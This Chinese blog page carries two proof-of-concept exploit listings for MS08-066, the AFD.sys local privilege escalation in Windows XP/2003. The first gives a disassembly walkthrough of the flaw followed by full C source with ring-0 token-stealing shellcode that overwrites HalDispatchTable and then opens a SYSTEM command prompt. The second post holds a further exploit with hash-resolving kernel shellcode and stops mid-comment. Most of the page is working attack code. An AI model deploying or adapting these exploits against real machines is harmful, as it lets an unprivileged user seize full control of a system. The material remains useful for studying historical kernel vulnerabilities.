

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

2008年10月19日 Chinadu 没有评论

作者:Eros412
MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx
 

**********计算IoControlCode过程**********

.text:00010B9F                 mov     eax, [edx+0Ch] ; edx=CurrentStackLocation
.text:00010BA2                 push    esi
.text:00010BA3                 mov     esi, ecx
.text:00010BA5                 mov     ecx, eax  ;ecx=IoControlCode
.text:00010BA7                 shr     ecx, 2
.text:00010BAA                 and     ecx, 3FFh
.text:00010BB0                 push    edi
.text:00010BB1                 mov     edi, _AfdImmediateCallDispatch[ecx*4] ; ecx=0x0F

.data:00011FF8 _AfdImmediateCallDispatch dd 0          ; DATA XREF: AfdDispatchImmediateIrp(x,x)+12r
.data:00011FF8                                         ; AfdFastIoDeviceControl(x,x,x,x,x,x,x,x,x)+7Ar

.data:00012034 off_12034       dd offset AfdGetRemoteAddress(x,x,x,x,x,x,x,x)
.data:00012034                                         ; DATA XREF: .data:0001213Co

//0x12034-0x11FF8= 0x3C,所以ecx=(0x3C/4)=0x0F

PAGEAFD:0001AE64                 cmp     _AfdIoctlTable[esi], edi ;
PAGEAFD:0001AE6A                 jnz     loc_20510
PAGEAFD:0001AE6A
PAGEAFD:0001AE70                 mov     [edx+1], al
PAGEAFD:0001AE73                 mov     esi, _AfdIrpCallDispatch[esi]

//我们从_AfdIoctlTable寻找一个运算后==0x0F的值

kd>dd _AfdIoctlTable
f81c3108  00012003 00012007 0001200b 0001200c
f81c3118  00012010 00012017 0001201b 0001201f
f81c3128  00012023 00012024 0001202b 0001202f
f81c3138  00012033 00012037 0001203b 0001203f
f81c3148  00012043 00012047 0001204b 0001204f

//答案是0001203f:(0x1203f >> 2) & 0x3FF == 0x0F,正好索引到 off_12034 = AfdGetRemoteAddress

***********************************************

*****************溢出过程**********************

PAGE:000171B5                 cmp     [ebp+OutputBufferLength], eax
PAGE:000171B8                 jnb     short loc_171C3
PAGE:000171B8
PAGE:000171BA                 mov     [ebp+var_24], 80000005h
PAGE:000171C1                 jmp     short loc_171C9---------------------------------------------〉big problem!!! (when OutputBufferLength is too small only STATUS_BUFFER_TOO_SMALL, 0x80000005, is recorded in var_24; the jump then joins the common path, so the length check never short-circuits the copy that starts at 000171E0 below)
PAGE:000171C1
PAGE:000171C3 ; ---------------------------------------------------------------------------
PAGE:000171C3
PAGE:000171C3 loc_171C3:                              ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+50j
PAGE:000171C3                 mov     [ebp+OutputBufferLength], eax
PAGE:000171C6                 mov     [ebp+var_24], esi
PAGE:000171C6
PAGE:000171C9
PAGE:000171C9 loc_171C9:                              ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+59j
PAGE:000171C9                 mov     [ebp+ms_exc.disabled], esi

PAGE:000171E0                 movzx   ecx, word ptr [ebx+5Ah] ;
PAGE:000171E4                 movzx   esi, word ptr [ebx+58h] ;
PAGE:000171E8                 add     esi, [ebp+ebx_70h] ;
PAGE:000171EB                 mov     edi, [ebp+OutputBuffer]-----------------------〉控制的OutputBuffer地址
PAGE:000171EE                 mov     eax, ecx
PAGE:000171F0                 shr     ecx, 2
PAGE:000171F3                 rep movsd--------------------------〉其实就是把 sockaddr_in(这个 socket 的对端地址,即 AfdGetRemoteAddress 要返回的内容)拷贝到
                                                                   OutputBuffer,并且不受 OutputBufferLength 限制。OutputBuffer==HalDispatchTable 时:
                                                                   [HalDispatchTable+0x00]==sin_family (AF_INET == 0x0002)
                                                                   [HalDispatchTable+0x02]==sin_port (0x8888)
                                                                   [HalDispatchTable+0x04]==sin_addr.s_addr (127.0.0.1 == 0x0100007F)

                                                                    kd>dd HalDispatchTable
                                                                    80538ab8  88880002 0100007f cccccccc cccccccc

PAGE:000171F5                 mov     ecx, eax        ;
PAGE:000171F7                 and     ecx, 3          ;
PAGE:000171FA                 rep movsb

 

#include <Winsock2.h>
#include <stdio.h>
#include <windows.h>
// Ring-0 payload reached once HalDispatchTable+4 has been redirected into the
// user-mode NOP region allocated in main().  Decoding the bytes (32-bit):
//   nop x6
//   mov  eax, 0FFDFF124h      ; KPCR+0x124 = KPRCB.CurrentThread on XP 32-bit
//   mov  eax, [eax]           ; current ETHREAD
//   mov  esi, [eax+220h]      ; ETHREAD.ThreadsProcess -> current EPROCESS
//   mov  eax, esi
// next:
//   mov  eax, [eax+88h]       ; EPROCESS.ActiveProcessLinks.Flink
//   sub  eax, 88h             ; back to the EPROCESS base
//   mov  edx, [eax+84h]       ; EPROCESS.UniqueProcessId
//   cmp  edx, 4               ; PID 4 == System
//   jnz  next
//   mov  eax, [eax+0C8h]      ; System's EPROCESS.Token
//   mov  [esi+0C8h], eax      ; replace our own Token with it
//   ret  8
// Field names/offsets are the Windows XP SP2 32-bit layout (the same build the
// hard-coded HalDispatchTable address 0x80538ab8 in main() belongs to); they
// differ on other builds -- confirm against the target kernel before reuse.
char ShellCode[]="\x90\x90\x90\x90\x90\x90\xB8\x24\xF1\xDF"
                 "\xFF\x8B\x00\x8B\xB0\x20\x02\x00\x00\x8B"
                 "\xC6\x8B\x80\x88\x00\x00\x00\x2D\x88\x00"
                 "\x00\x00\x8B\x90\x84\x00\x00\x00\x83\xFA"
                 "\x04\x75\xEA\x8B\x80\xC8\x00\x00\x00\x89"
                 "\x86\xC8\x00\x00\x00\xC2\x08\x00";

// Handshake events shared between main() and the FooServer listener thread.
typedef struct _THREAD_PARAMS
{
        HANDLE hInitEvent;   // set by FooServer once its listening socket is ready for connect()
        HANDLE hReadyEvent;  // set by main() when FooServer may close its sockets and exit
} THREAD_PARAMS, *PTHREAD_PARAMS;

// Prototypes for the two ntdll natives main() resolves with GetProcAddress.
// NtQueryIntervalProfile is the user-reachable syscall whose kernel side calls
// through HalDispatchTable+4 (see the disassembly note in main()).
typedef DWORD (WINAPI *PNTALLOCATE)(        IN HANDLE ProcessHandle,
                                        IN OUT PVOID            *BaseAddress,   // in: requested base, out: actual base
                                        IN ULONG                ZeroBits,
                                        IN OUT PULONG           RegionSize,     // in: requested size, out: rounded size
                                        IN ULONG                AllocationType,
                                        IN ULONG                Protect );

typedef DWORD (WINAPI *PNTQUERYINTERVAL)(  ULONG ProfileSource,PULONG          Interval );

#pragma comment (lib, "ws2_32.lib")

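// Listener thread: accepts exactly one loopback connection on 127.0.0.1:0x8888 so
// that main()'s client socket has a remote address (127.0.0.1:0x8888) for
// AfdGetRemoteAddress to copy.  hInitEvent is signalled only after listen() has
// succeeded -- the original signalled right after bind(), so main()'s connect()
// could race a bound-but-not-yet-listening socket and be refused.  Both sockets
// are kept open until hReadyEvent is set.
// Returns a thread exit code (0 on success, 1 on any socket failure) as
// LPTHREAD_START_ROUTINE expects; the cast in main() is unaffected.
DWORD WINAPI FooServer(LPVOID pParam)
{
    PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam;
    SOCKET tcp_socket = INVALID_SOCKET;
    SOCKET local_client = INVALID_SOCKET;
    sockaddr_in localonly;
    sockaddr_in remote;
    int remoteLen = sizeof(remote);

    memset(&localonly, 0, sizeof(localonly));
    localonly.sin_family = AF_INET;
    localonly.sin_addr.s_addr = inet_addr("127.0.0.1");
    localonly.sin_port = htons(0x8888);

    tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (tcp_socket == INVALID_SOCKET ||
        bind(tcp_socket, (sockaddr*)&localonly, sizeof(localonly)) == SOCKET_ERROR ||
        listen(tcp_socket, 2) == SOCKET_ERROR)
    {
        printf("\n\t-> listener setup failed: %d\n", WSAGetLastError());
        if (tcp_socket != INVALID_SOCKET)
            closesocket(tcp_socket);
        // Wake main() anyway so it does not block forever on hInitEvent; its
        // connect() then fails instead of hanging.
        SetEvent(lParams->hInitEvent);
        return 1;
    }
    SetEvent(lParams->hInitEvent);

    local_client = accept(tcp_socket, (struct sockaddr*)&remote, &remoteLen);
    if (local_client == INVALID_SOCKET)
    {
        printf("\n\t-> accept failed: %d\n", WSAGetLastError());
        closesocket(tcp_socket);
        return 1;
    }
    printf("\n\t-> Incoming connection: %s\n\n", inet_ntoa(remote.sin_addr));

    WaitForSingleObject(lParams->hReadyEvent, INFINITE);
    closesocket(local_client);
    closesocket(tcp_socket);
    return 0;
}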

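// Entry point.  Sequence:
//   1. Allocate a 0x90-filled region at 0x01000000 and place ShellCode at +0x100.
//   2. Start FooServer (loopback listener) and connect a client socket to it, so
//      the client socket's peer address is 127.0.0.1:0x8888.
//   3. Issue IOCTL 0x1203f (AfdGetRemoteAddress) on that socket with
//      OutputBufferLength == 0 and OutputBuffer == nt!HalDispatchTable.  Per the
//      disassembly above the driver records STATUS_BUFFER_TOO_SMALL but copies the
//      peer sockaddr_in anyway, so HalDispatchTable+4 becomes sin_addr.s_addr ==
//      0x0100007F, inside the NOP region, which slides into ShellCode.
//   4. NtQueryIntervalProfile makes the kernel call through HalDispatchTable+4.
//   5. Spawn cmd.exe, which inherits the token ShellCode installed.
// Hard-coded for Windows XP SP2 32-bit (HalDispatchTable == 0x80538ab8).
// Returns 0 on completion, 1 if any setup step fails.
int main () {

   printf("=====================================================================   \n");
   printf("\t\tMS08-066  AFD.sys Local Privilege Escalation Exploit  (POC)   \n");
   printf("\t\t    Coded and Modified by :Eros412               \n");
   printf("\t\t   Special Thanks to : Ruben Santamarta       \n");
   printf("=====================================================================   \n");

        ULONG result;
        int status;
        PROCESS_INFORMATION pi;
        STARTUPINFOA stStartup;
        // nt!HalDispatchTable on the target build (kd> dd HalDispatchTable -> 80538ab8).
        // KeQueryIntervalProfile dispatches through HalDispatchTable+4:
        //   8062cdc2 ff15bc8a5380    call    dword ptr [nt!HalDispatchTable+0x4 (80538abc)]
        // so that slot is what the overwrite redirects.  Adjust for any other build.
        DWORD HookAddress = 0x80538ab8;
        // "127.0.0.1" is 0x0100007F in memory, which is the value that lands in
        // HalDispatchTable+4; the region is therefore requested at 0x01000000 and
        // NOP-filled so that address slides into the payload copied to +0x100.
        PVOID ShellCodeMemory = (PVOID)0x01000000;
        DWORD MemorySize = 0x1000;
        PNTALLOCATE NtAllocateVirtualMemory;
        PNTQUERYINTERVAL NtQueryIntervalProfile;
        THREAD_PARAMS lParams = {0};
        HANDLE hThread;
        char inBuff[0x40];
        char cmdline[] = "cmd.exe";   // CreateProcess may write to lpCommandLine; do not pass a literal
        DWORD junk;
        SOCKET tcp_socket;
        struct sockaddr_in peer;
        WSADATA ws;

        if (WSAStartup(0x0202, &ws) != 0) {
                printf("WSAStartup failed\n");
                return 1;
        }

        NtAllocateVirtualMemory = (PNTALLOCATE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
        NtQueryIntervalProfile = (PNTQUERYINTERVAL)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
        if (NtAllocateVirtualMemory == NULL || NtQueryIntervalProfile == NULL) {
                printf("GetProcAddress on ntdll.dll failed\n");
                WSACleanup();
                return 1;
        }

        status = NtAllocateVirtualMemory((HANDLE)-1,
                                         &ShellCodeMemory,
                                         0,
                                         &MemorySize,
                                         MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                         PAGE_EXECUTE_READWRITE);
        // The call writes the rounded base/size back; the trick only works if both
        // 0x0100007F (the sled entry) and 0x01000100 + payload lie inside the region.
        if (status != 0 ||
            (DWORD)ShellCodeMemory > 0x0100007F ||
            (DWORD)ShellCodeMemory + MemorySize < 0x01000100 + sizeof(ShellCode)) {
                printf("NtAllocateVirtualMemory failed or returned an unusable region (status %08x, base %p)\n",
                       status, ShellCodeMemory);
                WSACleanup();
                return 1;
        }

        memset(ShellCodeMemory, 0x90, MemorySize);
        // Copy exactly the payload bytes; the original copied 80 bytes from a 59-byte array,
        // reading past the end of ShellCode.
        memcpy((BYTE*)ShellCodeMemory + 0x100, ShellCode, sizeof(ShellCode));
        memset(inBuff, 0x90, sizeof(inBuff));

        lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0);
        lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0);
        if (lParams.hInitEvent == NULL || lParams.hReadyEvent == NULL) {
                printf("CreateEvent failed: %lu\n", GetLastError());
                WSACleanup();
                return 1;
        }
        hThread = CreateThread(NULL,
                               0,
                               (LPTHREAD_START_ROUTINE)FooServer,
                               (LPVOID)&lParams,
                               0,
                               NULL);
        if (hThread == NULL) {
                printf("CreateThread failed: %lu\n", GetLastError());
                WSACleanup();
                return 1;
        }

        peer.sin_family = AF_INET;
        peer.sin_port = htons(0x8888);
        peer.sin_addr.s_addr = inet_addr("127.0.0.1");
        tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
        WaitForSingleObject(lParams.hInitEvent, INFINITE);
        if (tcp_socket == INVALID_SOCKET ||
            connect(tcp_socket, (struct sockaddr*)&peer, sizeof(sockaddr_in)) == SOCKET_ERROR) {
                printf("connect to 127.0.0.1:0x8888 failed: %d\n", WSAGetLastError());
                SetEvent(lParams.hReadyEvent);
                WaitForSingleObject(hThread, INFINITE);
                CloseHandle(hThread);
                if (tcp_socket != INVALID_SOCKET)
                        closesocket(tcp_socket);
                WSACleanup();
                return 1;
        }

        // OutputBufferLength 0 makes AfdGetRemoteAddress record STATUS_BUFFER_TOO_SMALL
        // yet still copy the peer sockaddr_in to OutputBuffer.  The call therefore
        // reports failure to user mode even when the overwrite happened, so its
        // return value is deliberately not checked.
        DeviceIoControl((HANDLE)tcp_socket,
                        0x1203f,
                        (LPVOID)inBuff, sizeof(inBuff),
                        (LPVOID)HookAddress, 0,
                        &junk,
                        NULL);

        // Kernel: KeQueryIntervalProfile -> call [HalDispatchTable+4] -> 0x0100007F
        // -> NOP sled -> ShellCode.
        NtQueryIntervalProfile(3, &result);

        SetEvent(lParams.hReadyEvent);
        WaitForSingleObject(hThread, INFINITE);
        closesocket(tcp_socket);
        CloseHandle(hThread);
        CloseHandle(lParams.hInitEvent);
        CloseHandle(lParams.hReadyEvent);
        WSACleanup();

        GetStartupInfoA(&stStartup);
        if (!CreateProcessA(NULL,
                            cmdline,
                            NULL,
                            NULL,
                            TRUE,
                            0,
                            NULL,
                            NULL,
                            &stStartup,
                            &pi)) {
                printf("CreateProcess failed: %lu\n", GetLastError());
                return 1;
        }
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);

        return 0;
}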

http://www.milw0rm.com/exploits/6757 - MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) by Ruben Santamarta
http://www.whitecell.org/list.php?id=60 - Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066) by  Polymorphours
http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx - Microsoft SWI: MS08-066, how to correctly validate and capture user-mode data
 


ms08-066

2008年10月16日 Chinadu 没有评论

作者:SoBeIt

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

#define NTSTATUS int

/* Layout returned by ZwQueryInformationProcess(ProcessBasicInformation) on
 * 32-bit Windows.  main() only consumes InheritedFromUniqueProcessId. */
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG AffinityMask;
ULONG BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId; /* parent PID; handed to the kernel payload through buf[] */
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

/* One 16-bit entry of a PE base-relocation block: low 12 bits are the offset
 * within the block's page, high 4 bits the IMAGE_REL_BASED_* type.
 * Walked by GetServiceTable(). */
typedef struct _IMAGE_FIXUP_ENTRY {
USHORT Offset:12;
USHORT Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

/* Information classes for ZwQueryInformationProcess.  Only
 * ProcessBasicInformation (0) is used, in main().  The misspelled tag name and
 * ProcessDeaultHardErrorMode are never referenced and are left as-is. */
typedef enum _PROCESS_IMFORMATION_CLASS {
ProcessBasicInformation, /* 0 - the only class this file queries */
ProcessQuotaLimits,
ProcessIoCounters,
ProcessVmCounters,
ProcessTimes,
ProcessBasePriority,
ProcessRaisePriority,
ProcessDebugPort,
ProcessExceptionPort,
ProcessAccessToken,
ProcessLdtInformation,
ProcessLdtSize,
ProcessDeaultHardErrorMode,
ProcessIoPortHandlers,
ProcessPooledUsageAndLimits,
ProcessWorkingSetWatch,
ProcessUserModeIOPL,
ProcessEnableAlignmentFaultFixup,
ProcessPriorityClass,
ProcessWx86Information,
ProcessHandleCount,
ProcessAffinityMask,
ProcessPriorityBoost,
ProcessDeviceMap,
ProcessSessionInformation,
ProcessForegroundInformation,
ProcessWow64Information
} PROCESS_INFORMATION_CLASS;

/* Information classes for ZwQuerySystemInformation.  Only
 * SystemModuleInformation (11) is used, by GetKernelBase(), to enumerate
 * loaded kernel modules. */
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation, /* 11 - used by GetKernelBase() */
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructioEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegisterQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation
} SYSTEM_INFORMATION_CLASS;

/* Profile sources accepted by ZwQueryIntervalProfile.  main() passes
 * ProfileTotalIssues (2); the value matters only in that the call must reach
 * the kernel path that dispatches through HalDispatchTable+4 (the Eros412
 * listing on this page uses 3 for the same purpose). */
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues, /* 2 - what main() passes */
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

/* Native counted string.  Declared for completeness; nothing in this listing
 * uses it. */
typedef struct _UNICODE_STRING {
USHORT Length;        /* bytes, excluding terminator */
USHORT MaximumLength; /* bytes available in Buffer */
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* Result of ZwQuerySection(SectionBasicInformation).  main() declares an
 * instance (sbi) but never fills or reads it. */
typedef struct _SECTION_BASIC_INFORMATION {
PVOID BaseAddress;
ULONG Attributes;
LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

/* One entry of the SystemModuleInformation array (284 bytes on 32-bit; the
 * array is preceded by a ULONG count).  GetKernelBase() matches ImageName
 * against "ntoskrnl.exe"/"ntkrnlpa.exe" and returns Base.
 * NOTE(review): ImageName is treated as NUL-terminated by strstr(); the kernel
 * is expected to terminate it but nothing here enforces that. */
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;            /* load address of the module in kernel space */
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset; /* offset of the bare file name inside ImageName */
CHAR ImageName[256];     /* full path of the image */
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

/* Prototypes of the ntdll natives this file resolves at run time in
 * GetFunction().  NTSTATUS is #defined as int above; callers treat any
 * non-zero return as failure. */
typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG);                         /* ZwQueryIntervalProfile(Source, &Interval) */
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG); /* (Process, Class, Buffer, Length, &Returned) */
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);         /* (Class, Buffer, Length, &Returned) */
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG); /* base and size are in/out */
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);

/* File-level function pointers; NULL until GetFunction() has run. */
ZWQUERYINTERNALPROFILE ZwQueryIntervalProfile;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;

/* Kernel export names the payload resolves at run time.  main() hashes each
 * with ComputeHash() and stores the hashes in the parameter area of
 * shellcode[]; the empty string terminates the list.  Room for up to 64
 * names of at most 63 characters. */
unsigned char kfunctions[64][64] =
{
//ntoskrnl.exe
{"ZwTerminateProcess"},
{"PsLookupProcessByProcessId"},
{""},
};

/* Kernel-mode payload copied to 0x8000 by main().  It is position independent
 * (starts with pushad/pushfd and a call/pop to locate itself) and resolves the
 * exports listed in kfunctions[] by hash (the ror-7/add loop near "\xc1\xcb\x07").
 * The "\x90\xcc\xcc\x90" marker (0x90cccc90 read as a little-endian ULONG) ends
 * the code; main() searches for it and overwrites the 0x90 bytes that follow with
 * the parameter block: export hashes, parent PID, System PID, restore buffer,
 * hook address, 4, token offset.
 * NOTE(review): what the payload does with those parameters (presumably token
 * replacement via PsLookupProcessByProcessId and restoring HalDispatchTable+4)
 * is not verified here -- disassemble before relying on it. */
unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\x64\x8b\x35"
"\x38\x00\x00\x00\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"

/* marker, then the parameter area main() fills in */
"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";

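/* Print pMsg followed by the current Win32 error code and terminate the
 * process.  pMsg: message text, expected to end with '\n'.  Never returns.
 * The original declared pMsg with an implicit int type (K&R style) and printed
 * the DWORD error with %d; both are fixed here.  The exit code stays 0 as
 * before, so a caller's shell cannot tell failure from success. */
void ErrorQuit(const char *pMsg)
{
    printf("%sError Code:%lu\n", pMsg, GetLastError());
    ExitProcess(0);
}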

/* Hash a NUL-terminated name with a rotate-right-7-then-add scheme: for each
 * byte the running 32-bit value is rotated right by 7 and the byte added.
 * The kernel payload appears to use the same scheme (ror ebx,7 / add ebx,edx
 * in shellcode[]) to look up exports.  Returns 0 for the empty string. */
ULONG ComputeHash(char *ch)
{
    ULONG hash = 0;
    const char *p;

    for (p = ch; *p != '\0'; p++)
    {
        ULONG rotated = (hash << 25) | (hash >> 7);
        hash = rotated + (ULONG)*p;
    }

    return hash;
}

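/* Resolve the ntdll exports used by this file into the file-level function
 * pointers.  Terminates through ErrorQuit() if ntdll cannot be loaded or any
 * export is missing.  ntdll is already mapped in every Win32 process, so the
 * LoadLibrary/FreeLibrary pair only adjusts its reference count and the
 * resolved pointers remain valid after FreeLibrary. */
void GetFunction()
{
    HMODULE hNtdll;

    hNtdll = LoadLibrary("ntdll.dll");
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed.\n");

    ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
    if(ZwQueryIntervalProfile == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
    if(ZwQueryInformationProcess == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
    if(ZwQuerySystemInformation == NULL)
        ErrorQuit("GetProcAddress failed.\n"); /* message made consistent with the others */

    ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
    if(ZwAllocateVirtualMemory == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
    if(RtlImageNtHeader == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
    if(RtlImageDirectoryEntryToData == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    FreeLibrary(hNtdll);
}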

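/* Locate the running kernel via ZwQuerySystemInformation(SystemModuleInformation).
 * On success copies the bare file name ("ntoskrnl.exe" or "ntkrnlpa.exe") into
 * KernelName -- the caller must provide at least 13 bytes -- and returns the
 * kernel's load address.  Returns 0 if neither name is found.  Terminates
 * through ErrorQuit() when the query or the allocation fails. */
ULONG GetKernelBase(char *KernelName)
{
    static const char *const candidates[] = { "ntoskrnl.exe", "ntkrnlpa.exe" };
    ULONG i, c, Byte = 0, ModuleCount, KernelBase;
    PVOID pBuffer;
    PSYSTEM_MODULE_INFORMATION pModule;

    /* First call with an empty buffer only reports the size needed in Byte. */
    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
    if(Byte == 0)
        ErrorQuit("ZwQuerySystemInformation did not return a buffer size\n");

    if((pBuffer = malloc(Byte)) == NULL)
        ErrorQuit("malloc failed.\n");

    if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
        ErrorQuit("ZwQuerySystemInformation failed\n"); /* pBuffer is not freed; ErrorQuit exits */

    ModuleCount = *(PULONG)pBuffer;
    /* Guard against walking past the buffer if the count and size disagree. */
    if(sizeof(ULONG) + (ULONGLONG)ModuleCount * sizeof(SYSTEM_MODULE_INFORMATION) > Byte)
        ErrorQuit("SystemModuleInformation buffer is inconsistent\n");

    pModule = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
    for(i = 0; i < ModuleCount; i++, pModule++)
    {
        for(c = 0; c < sizeof(candidates) / sizeof(candidates[0]); c++)
        {
            if(strstr(pModule->ImageName, candidates[c]) != NULL)
            {
                KernelBase = (ULONG)pModule->Base;
                printf("Kernel is %s\n", pModule->ImageName);
                strcpy(KernelName, candidates[c]);
                free(pBuffer);
                return KernelBase;
            }
        }
    }

    free(pBuffer);
    return 0;
}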

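/* Scan the base-relocation table of a user-mode mapping of the kernel image
 * for a "mov dword ptr [disp32], imm32" (opcode C7 05) whose relocated disp32
 * equals Address, and return its imm32 operand as an RVA.  Given the address of
 * a kernel global this recovers the value the image's code stores into it.
 * pImageBase: base returned by LoadLibrary() for the kernel file.
 * Address:    absolute address of the target global inside that mapping.
 * Returns 0 when the image has no relocation directory or no match is found.
 * Named for locating a service table; not called from main() in this listing.
 * Changes from the original: the walk is bounded by the directory size and stops
 * on a block with SizeOfBlock < sizeof(IMAGE_BASE_RELOCATION), which previously
 * looped forever (SizeOfBlock == 0) or underflowed the entry count. */
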